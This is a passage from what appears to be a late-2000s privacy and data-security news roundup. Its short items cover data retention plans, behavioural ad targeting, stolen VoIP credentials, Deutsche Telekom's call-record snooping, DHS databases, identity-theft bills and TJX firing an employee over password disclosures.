communication, when the communication occurred and the duration of the
communication; the content of the communications would not be retained. The
information would be held in one database, which has caused some concern in
light of the recent problems government entities have had with data security.
Police and other law enforcement officials would be allowed access to the
database with permission from the courts. [Source]
[Source]
Two
lawmakers are questioning whether or not Charter Communication's plan to share
data about their users Web habits violates users' privacy rights, says a report
at Media Post Publications. Charter is working with behavioral-targeting
company NebuAd to pilot the technology with some of its 2.8 million users,
letting NebuAd collect data about Charter customers' Web activity to then send
those users ads better targeting their interests. In a letter to Charter CEO
Neil Smith, Rep. Ed Markey and Rep. Joe Barton requested that the company
postpone deployment until discussions on privacy issues can take place. Charter
said on Friday that they are "...pleased to discuss this matter,"
with the Congressmen. [Source]
Usernames
and passwords from voice-over IP (VoIP) phone accounts are selling online for
more than stolen credit cards. The information allows someone to use the
telephone service for free. Net telephony fraud is still in its infancy, with
eavesdropping on calls being the most common security flaw. But the move into
stealing usernames and passwords which are routinely sent across the network
when a call is made, is a worrying new trend. “90% of carriers don’t offer a
secure VoIP service.” [Source]
In
a situation reminiscent of the HP scandal a few years back in the US, Deutsche
Telekom is suspected of having snooped on communications to determine the
source of leaks to the media involving sensitive information. The Deutsche
Telekom internal security unit allegedly used stored information, including
numbers dialed, dates and durations of calls to look for connections between
Telekom executives and media reporters. The breaches allegedly took place three
years ago, and both public prosecutors and a private law firm are
investigating. No calls were tapped, according to Telekom, but the stored data
were accessed without authorization. The German government is urging Deutsche
Telekom to be forthcoming with information about how investigators obtained the
information. [Source]
[Source]
[Source]
[Source]
Government
employees, contractors and consultants with access to DHS computer systems are
among those whose names and personal information will be kept in a newly
created database, according to a notice posted in the Federal Register. The
General Information Technology Access Account Records System (GITAARS) will
collect and store information on everyone with regular access to departmental
IT systems. Use and distribution of the GITAARS system of records is to be
regulated by the Privacy Act of 1984. Public comments on the proposed
database are due by June 16. The database will contain names, business affiliations,
positions, phone numbers, citizenship, home addresses, e-mail addresses, access
records, date and time of access, logs of Internet activity and Internet
protocol address of access. The information will be shared routinely with other
government agencies for purposes such as workforce surveys in addition to
auditing and oversight. In some cases, DHS will provide additional information,
the notice stated. “In some cases DHS must provide ... other information such
as: occupation group/family, organization, supervisory status, grade, work
role, duty station, series, pay plan, service in government, highest level of
education, years of professional service, years of service in government,
projected retirement, position title, work phone number and work address,” the
notice said.
The
department also proposed routinely sharing business contact information
available in the database and information that might relate to an investigation
of identity theft. In a separate Federal Register notice, DHS’ Office of
Intelligence and Analysis intends to create a new Enterprise Records System to
track the investigation of people suspected of terrorist threats and activity,
including threats against critical infrastructure such as key computer systems.
The Bush administration is proposing that the new intelligence database be
exempt — for national security purposes — from most Privacy Act rules
and notifications. The new Enterprise Records System will apply to persons
suspected of being involved in threats, which includes cyberthreats against
critical infrastructure computer systems, according to the notice. The database
covers activities meant to “identify, create, or exploit” the vulnerabilities
of key resources such as “the cyber and national telecommunications infrastructure
and availability of a viable national security and emergency preparedness
communications infrastructure, “the notice said. Investigations of people
suspected of financial crimes, including those conducted through identity
theft, computer fraud and computer-based attacks, are also to be included in
the database. [Source]
An
influential group of MPs has urged the government to seek assurances from Washington
that the Patriot Act would not be used to access personal data contained in the
UK census, if it is outsourced to US defence contractor Lockheed Martin. The
cross-party Treasury Select Committee is making the call today as part of the
results of an investigation into the upcoming census in 2011. The once per
decade data-gathering exercise is used by government departments to target
billions of pounds of public spending, but has been criticised as unable to
cope with a more mobile population. Lockheed Martin, whose corporate slogan is
"We never forget who we're working for", is bidding against Deutsche
Telekom's T-Systems division for the £450m contract to run what's reckoned will
be the last census in its traditional centralised form. The Office of National
Statistics (ONS) is expected to announce the winner in June. Lockheed's
potential involvement has been opposed by
anti-arms industry campaigners, including the Green Party and privacy
advocates. [Source]
New
York Governor David Patterson has introduced legislation aimed at protecting
citizens from identity fraud and theft. The bill would restrict how employers
may use employee’s personal information and allows residents of New York to put
their names on “exclusion lists.” In addition, the bill would make it a crime
to possess a skimmer device when there is intent to use it to commit data
theft. [Source]
See also: [Utah
Lawmaker Likes Identity Locks for Children] See also: [Utah targets ID
theft of children] and [Hawaiin
Governor Signs Bill to Protect Hawaii Residents Against Identity Theft]
Pharmacies
in California would be allowed to sell confidential patient prescription
information to third-party marketing firms working for drug companies under a
bill expected to be voted on Thursday by the state Senate. The legislation
would allow pharmaceutical firms to send mailings directly to patients.
Supporters of the proposal say the intent is to remind patients to take their
medicine and order refills. But consumer privacy advocates are outraged.
"This bill would be a windfall for corporations seeking to track, buy and
sell a patient's private medical records," said the Consumer Federation of
California. "This would represent a significant intrusion by
pharmaceutical companies into the privacy of patients. [Source]
See also: [Hospitals,
patients clash on privacy rights]
Should
political flame-throwers have to identify themselves in the paid ads they place
in newspapers or the campaign fliers they drop on doorsteps? Under current
state law, the answer is yes. But a bill to repeal those requirements is headed
for a House vote this week after a brief - but fiery - floor debate last week
that was cut short by the chamber's Democratic leaders. [Source]
In
its 5th annual study of outbound e-mail and data loss prevention
issues, Proofpoint found that large enterprises continue to incur risk from -
and take action against - information leaks over outbound e-mail, as well as
newer communications media such as blogs, message boards, media sharing sites
and mobile devices. Outbound e-mail remains a key source of risk for U.S.
enterprises with a record 44% of surveyed companies reporting that they
investigated an e-mail leak of confidential information in the past 12 months.
Other key findings in the survey, covering activites in the past 12 months
include:
Israel
labor and employer organizations have come to consensus on the degree of
privacy employees should have while using a workplace computer, and on what
access employers should be permitted. The draft agreement, currently under
review by the Coordinating Bureau of Economic Organizations, is a form of the
European model, which is generally considered to give employees a strong level
of privacy. If approved, all workplaces may institute the framework. Shlomo
Neuman, who was involved in the formulation of the agreement said the groups
based their work on European precedents “so as to balance the employer’s right
to property and the employee’s right to privacy.” [Source]
TJX
Companies has fired an employee from a Kansas TJ Maxx store for making posts to
a forum about the company’s lax security practices, even after the notable
breach. The employee said in several posts that except for a period of time
following the breach disclosure when a strong password policy was enforced, the
employee password at his store’s server was set to blank. In addition, at one
point a store server was running in administrator mode. When he began work at
TJX, his password was the same as his user name. TJX says he was fired for
disclosing confidential company information. [Source]
[Source]
--------